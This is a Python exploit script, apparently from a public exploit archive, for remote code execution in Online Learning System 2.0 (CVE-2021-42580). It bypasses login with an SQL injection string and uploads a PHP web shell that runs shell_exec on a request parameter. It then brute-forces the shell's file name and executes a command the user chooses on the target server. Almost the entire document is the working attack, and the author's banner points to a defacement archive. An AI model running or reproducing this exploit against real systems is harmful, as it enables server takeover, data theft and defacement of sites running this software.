Online Learning System version 2.0 remote code execution exploit that leverages SQL injection, authentication bypass, and file upload vulnerabilities.
f1d60fe020db91363e34d8e5e5d028e1# Exploit Title: Online Learning System 2.0 - Remote Code Execution (RCE)
# Date: 15/11/2021
# Exploit Author: djebbaranon
# Vendor Homepage: https://github.com/oretnom23
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/elearning_v2_0.zip
# Version: 2.0
# Tested on: Kali linux / Windows 10
# CVE : CVE-2021-42580
#!/usr/bin/python3
import os
import time
import argparse
import requests
import sys
from colorama import init
from colorama import Fore
from colorama import Back
from colorama import Style
init(autoreset=True)
def banner():
print('''
_____ _ _ _ _ _____ ______ _____ _____
| _ | | (_) | | (_) / __ \ | ___ / __ | ___|
| | | |_ __ | |_ _ __ ___ | | ___ __ _ _ __ _ __ _ _ __ __ _ __ _`' / /' | |_/ | / \| |__
| | | | '_ \| | | '_ \ / _ \ | |/ _ \/ _` | '__| '_ \| | '_ \ / _` | \ \ / / / / | /| | | __|
\ \_/ | | | | | | | | | __/ | | __| (_| | | | | | | | | | | (_| | \ V /./ /___ | |\ \| \__/| |___
\___/|_| |_|_|_|_| |_|\___| |_|\___|\__,_|_| |_| |_|_|_| |_|\__, | \_/ \_____/ \_| \_|\____\____/
__/ |
|___/
Written by djebbaranon
twitter : @dj3bb4ran0n1
zone-h : http://zone-h.org/archive/notifier=djebbaranon
''')
banner()
def my_args():
parser = argparse.ArgumentParser(epilog="Example : python3 -u http://localhost/elearning -r 1000 -c whoami")
parser.add_argument("-u","--url",type=str,required=True,help="url of target")
parser.add_argument("-r","--range",type=int,required=True,help="range for bruteforce the webshell name")
parser.add_argument("-c","--command",type=str,required=True,help="command to execute")
my_arguments = parser.parse_args()
return my_arguments
def login_with_sqli_login_bypass(user,passw):
global session
global url
global cookies
url = my_args().url
session = requests.Session()
data = {
"username" : user,
"password" : passw,
}
try:
response = session.post(url + "/classes/Login.php?f=login",data=data,verify=False)
print( Fore.GREEN + "[+] Logged in succsusfully")
cookies = response.cookies.get_dict()
print("[+] your cookie : ")
except requests.HTTPError as exception:
print(Fore.RED + "[-] HTTP Error : {}".format(exception))
sys.exit(1)
login_with_sqli_login_bypass("' or 1=1 -- -","' or 1=1 -- -")
def main(shell_name,renamed_shell):
try:
payload ={
"id" : "",
"faculty_id" : "test",
"firstname" : "test",
"lastname" : "test",
"middlename" : "fsdfsd",
"dob" : "2021-10-29",
"gender": "Male",
"department_id" : "1",
"email" : "[email protected]",
"contact" : "zebii",
"address" : "zebii",
}
files = {
"img" :
(
shell_name,
"<?php echo \"<pre><h1>nikmok</h1>\" . shell_exec($_REQUEST['cmd']) . \"</pre>\"?>",
"application/octet-stream",
)
}
vunlerable_file = "/classes/Master.php?f=save_faculty"
print("[*] Trying to upload webshell ....")
response_2 = session.post(url + vunlerable_file,data=payload,cookies=cookies,files=files)
print("[+] trying to bruteforce the webshell ....")
rangee = my_args().range
for i in range(0,rangee):
try:
with requests.get(url + "/uploads/Favatar_" + str(i) + ".php?cmd=whoami",allow_redirects=False) as response3:
if "nikmok" in response3.text and response3.status_code == 200:
print("\n" + Fore.GREEN + "[+] shell found : " + response3.url +"\n")
break
with open("shell.txt",mode="w+") as writer:
writer.write(response3.url)
else:
print( Fore.RED + "[-] shell not found : " + response3.url)
except requests.HTTPError as exception2:
print("[-] HTTP Error : {0} ".format(exception2))
except requests.HTTPError as error:
print("[-] HTTP Error : ".format(error))
command = my_args().command
with requests.get(response3.url.replace("whoami",command)) as response4:
print("[*] Executing {} ....".format(command))
time.sleep(3)
print("\n" + Style.BRIGHT + Fore.GREEN + response4.text)
main("hackerman.php","")